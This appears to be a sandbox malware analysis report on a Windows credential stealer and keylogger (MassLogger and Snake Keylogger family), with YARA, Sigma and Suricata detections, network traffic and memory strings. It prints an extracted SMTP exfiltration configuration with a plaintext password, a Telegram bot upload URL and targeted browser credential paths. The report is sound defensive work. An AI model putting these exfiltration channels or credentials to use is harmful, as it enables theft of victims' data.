5.2.porcelainization.exe.18e0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 BF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.2690ae6.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2690ae6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2690ae6.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2690ae6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2690ae6.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d464:$a1: get_encryptedPassword 0x1d438:$a2: get_encryptedUsername 0x1d4fc:$a3: get_timePasswordChanged 0x1d414:$a4: get_passwordField 0x1d47a:$a5: set_encryptedPassword 0x1d247:$a7: get_logins 0x1c7b5:$a8: GetOutlookPasswords 0x1bcc9:$a9: StartKeylogger 0x1a723:$a10: KeyLoggerEventArgs 0x1a6f2:$a11: KeyLoggerEventArgsEventHandler 0x1d31b:$a13: _encryptedPassword
3.2.RegSvcs.exe.2690ae6.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21b53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21051:$a3: \Google\Chrome\User Data\Default\Login Data 0x2135f:$a4: \Orbitum\User Data\Default\Login Data 0x22157:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.27d0000.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.27d0000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d464:$a1: get_encryptedPassword 0x1d438:$a2: get_encryptedUsername 0x1d4fc:$a3: get_timePasswordChanged 0x1d414:$a4: get_passwordField 0x1d47a:$a5: set_encryptedPassword 0x1d247:$a7: get_logins 0x1c7b5:$a8: GetOutlookPasswords 0x1bcc9:$a9: StartKeylogger 0x1a723:$a10: KeyLoggerEventArgs 0x1a6f2:$a11: KeyLoggerEventArgsEventHandler 0x1d31b:$a13: _encryptedPassword
3.2.RegSvcs.exe.26919ce.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.26919ce.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.26919ce.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.26919ce.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.26919ce.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c57c:$a1: get_encryptedPassword 0x1c550:$a2: get_encryptedUsername 0x1c614:$a3: get_timePasswordChanged 0x1c52c:$a4: get_passwordField 0x1c592:$a5: set_encryptedPassword 0x1c35f:$a7: get_logins 0x1b8cd:$a8: GetOutlookPasswords 0x1ade1:$a9: StartKeylogger 0x1983b:$a10: KeyLoggerEventArgs 0x1980a:$a11: KeyLoggerEventArgsEventHandler 0x1c433:$a13: _encryptedPassword
3.2.RegSvcs.exe.26919ce.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20c6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20169:$a3: \Google\Chrome\User Data\Default\Login Data 0x20477:$a4: \Orbitum\User Data\Default\Login Data 0x2126f:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.39e6458.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.39e6458.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.39e6458.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.39e6458.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.39e6458.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c57c:$a1: get_encryptedPassword 0x444b4:$a1: get_encryptedPassword 0x1c550:$a2: get_encryptedUsername 0x44488:$a2: get_encryptedUsername 0x1c614:$a3: get_timePasswordChanged 0x4454c:$a3: get_timePasswordChanged 0x1c52c:$a4: get_passwordField 0x44464:$a4: get_passwordField 0x1c592:$a5: set_encryptedPassword 0x444ca:$a5: set_encryptedPassword 0x1c35f:$a7: get_logins 0x44297:$a7: get_logins 0x1b8cd:$a8: GetOutlookPasswords 0x43805:$a8: GetOutlookPasswords 0x1ade1:$a9: StartKeylogger 0x42d19:$a9: StartKeylogger 0x1983b:$a10: KeyLoggerEventArgs 0x41773:$a10: KeyLoggerEventArgs 0x1980a:$a11: KeyLoggerEventArgsEventHandler 0x41742:$a11: KeyLoggerEventArgsEventHandler 0x1c433:$a13: _encryptedPassword
3.2.RegSvcs.exe.39e6458.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20c6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ba3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20169:$a3: \Google\Chrome\User Data\Default\Login Data 0x480a1:$a3: \Google\Chrome\User Data\Default\Login Data 0x20477:$a4: \Orbitum\User Data\Default\Login Data 0x483af:$a4: \Orbitum\User Data\Default\Login Data 0x2126f:$a5: \Kometa\User Data\Default\Login Data 0x491a7:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2690ae6.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2690ae6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2690ae6.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2690ae6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2690ae6.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b664:$a1: get_encryptedPassword 0x1b638:$a2: get_encryptedUsername 0x1b6fc:$a3: get_timePasswordChanged 0x1b614:$a4: get_passwordField 0x1b67a:$a5: set_encryptedPassword 0x1b447:$a7: get_logins 0x1a9b5:$a8: GetOutlookPasswords 0x19ec9:$a9: StartKeylogger 0x18923:$a10: KeyLoggerEventArgs 0x188f2:$a11: KeyLoggerEventArgsEventHandler 0x1b51b:$a13: _encryptedPassword
3.2.RegSvcs.exe.2690ae6.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fd53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f251:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f55f:$a4: \Orbitum\User Data\Default\Login Data 0x20357:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.3a0e390.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3a0e390.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3a0e390.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.3a0e390.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3a0e390.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a77c:$a1: get_encryptedPassword 0x1a750:$a2: get_encryptedUsername 0x1a814:$a3: get_timePasswordChanged 0x1a72c:$a4: get_passwordField 0x1a792:$a5: set_encryptedPassword 0x1a55f:$a7: get_logins 0x19acd:$a8: GetOutlookPasswords 0x18fe1:$a9: StartKeylogger 0x17a3b:$a10: KeyLoggerEventArgs 0x17a0a:$a11: KeyLoggerEventArgsEventHandler 0x1a633:$a13: _encryptedPassword
3.2.RegSvcs.exe.3a0e390.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ee6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e369:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e677:$a4: \Orbitum\User Data\Default\Login Data 0x1f46f:$a5: \Kometa\User Data\Default\Login Data
Click to see the 79 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs" , ProcessId: 3952, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs" , ProcessId: 3952, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\underbalance\porcelainization.exe, ProcessId: 6040, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:14:30.202807+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	158.101.44.242	80	TCP
2025-01-11T01:14:39.015352+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Virustotal: Detection: 48%			Perma Link

Multi AV Scanner detection for submitted file

Source: yqfze5TKW7.exe	Virustotal: Detection: 48%			Perma Link
Source: yqfze5TKW7.exe	ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yqfze5TKW7.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: yqfze5TKW7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49708 version: TLS 1.0

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746643773.00000000027F8000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746600347.0000000003139000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: porcelainization.exe, 00000002.00000003.1526731104.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000002.00000003.1529325944.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647762730.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647561040.0000000004210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: porcelainization.exe, 00000002.00000003.1526731104.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000002.00000003.1529325944.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647762730.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647561040.0000000004210000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0068445A
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068C6D1 FindFirstFileW,FindClose,	0_2_0068C6D1
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0068C75C
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068EF95
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068F0F2
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068F3F3
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006837EF
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00683B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00683B12
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068BCBC
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0104445A
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0104C75C
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104C6D1 FindFirstFileW,FindClose,	2_2_0104C6D1
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0104EF95
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0104F0F2
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0104F3F3
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_010437EF
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01043B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_01043B12
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0104BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_0278DA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD4A55h	3_2_05FD4718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDE898h	3_2_05FDE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD6868h	3_2_05FD65C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD3861h	3_2_05FD35B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDE440h	3_2_05FDE198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD6410h	3_2_05FD6168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD3409h	3_2_05FD3160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDDFE8h	3_2_05FDDD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD5FB8h	3_2_05FD5D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD559Ah	3_2_05FD54F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDDB90h	3_2_05FDD8E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD559Ah	3_2_05FD54BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDD738h	3_2_05FDD490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDF9F8h	3_2_05FDF750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDF5A0h	3_2_05FDF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD7570h	3_2_05FD72C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDD2E0h	3_2_05FDCEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD4569h	3_2_05FD42C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDF148h	3_2_05FDEEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD7118h	3_2_05FD6E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD4111h	3_2_05FD3E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FDECF0h	3_2_05FDEA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD6CC0h	3_2_05FD6A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05FD3CB9h	3_2_05FD3A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	6_2_014CDA38

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 158.101.44.242:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49708 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_006922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006922EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2747027909.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.0000000003550000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.00000000034D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746672017.000000000327F000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.0000000003578000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.0000000003518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746672017.000000000327F000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2747257139.000000000355C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
